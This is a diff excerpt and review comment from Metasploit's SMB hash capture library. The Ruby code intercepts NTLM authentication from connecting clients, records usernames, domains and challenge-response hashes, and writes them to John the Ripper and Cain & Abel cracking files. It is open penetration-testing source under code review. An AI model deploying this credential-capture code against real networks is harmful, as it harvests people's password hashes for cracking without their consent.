lib/msf/core/exploit/smb_hash_capture.rb

```diff
@@ -0,0 +1,199 @@
+            workspace_id: myworkspace_id,
+            realm_key: creds[:realm_key],
+            realm_value: creds[:realm_value]
+          }
+        )
+      end
+
+      if datastore['JOHNPWFILE']
+        path = build_jtr_file_name(creds[:jtr_format])
+
+        File.open(path, 'ab') do |f|
+          f.puts(creds[:combined_hash])
+        end
+      end
+
+      # Cain & Abel doesn't support import of NTLMv2 hashes
+      if datastore['CAINPWFILE'] && creds[:jtr_format] == JTR_NTLMV1
+        # Cain&Abel hash format
+        # Username:Domain:Challenge:LMHash:NTLMHash
+        File.open(File.expand_path(datastore['CAINPWFILE'], Msf::Config.install_root), 'ab') do |f|
+          f.puts("#{creds[:username]}:#{creds[:domain]}:#{creds[:server_challenge]}:#{creds[:client_hash]}")
+        end
+      end
+    end
+
+    def build_jtr_file_name(jtr_format)
+      # JTR NTLM hash format NTLMv1
+      # Username::Domain:LMHash:NTHash:Challenge
+      #
+      # JTR NTLM hash format NTLMv2
+      # Username::Domain:Challenge:NTHash[0...16]:NTHash[16...-1]
+
+      path = File.expand_path(datastore['JOHNPWFILE'], Msf::Config.install_root)
+
+      # if the passed file name does not contain an extension
+      if File.extname(File.basename(path)).empty?
+        path += "_#{jtr_format}"
+      else
+        path_parts = path.split('.')
+
+        # inserts _jtr_format between the last extension and the rest of the path
+        path = "#{path_parts[0...-1].join('.')}_#{jtr_format}.#{path_parts[-1]}"
+      end
+
+      path
+    end
+
+    def bin_to_hex(str)
+      str.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
+    end
+
+    class HashCaptureNTLMProvider < RubySMB::Gss::Provider::NTLM
+      def initialize(allow_anonymous: false, default_domain: 'WORKGROUP', listener: nil)
+        super(allow_anonymous: allow_anonymous, default_domain: default_domain)
+        @listener = listener
+      end
+
+      # Needs overwritten to ensure our version of Authenticator is returned
+      def new_authenticator(server_client)
+        # build and return an instance that can process and track stateful information for a particular connection but
+        # that's backed by this particular provider
+        HashCaptureAuthenticator.new(self, server_client)
+      end
+
+      attr_reader :listener
+    end
+
+    class HashCaptureAuthenticator < RubySMB::Gss::Provider::NTLM::Authenticator
+      def process_ntlm_type1(type1_msg)
+        @client_os_version = type1_msg.os_version
+        # TODO: write method for mapping +major+ and +minor+ OS values to human-readable OS names.
+        # @client_os_version = ::NTLM::OSVersion.read(type1_msg.os_version)
+        super
+      end
+
+      def process_ntlm_type3(type3_msg)
+        _, client = ::Socket.unpack_sockaddr_in(@server_client.getpeername)
+
+        if @provider.listener
+          @provider.listener.on_ntlm_type3(
+            client: client,
+            client_os_version: @client_os_version,
```

Comment:
Let's replace this with the type1 message entirely, and leave the decision to log the client_os_version to the receiver of this method entirely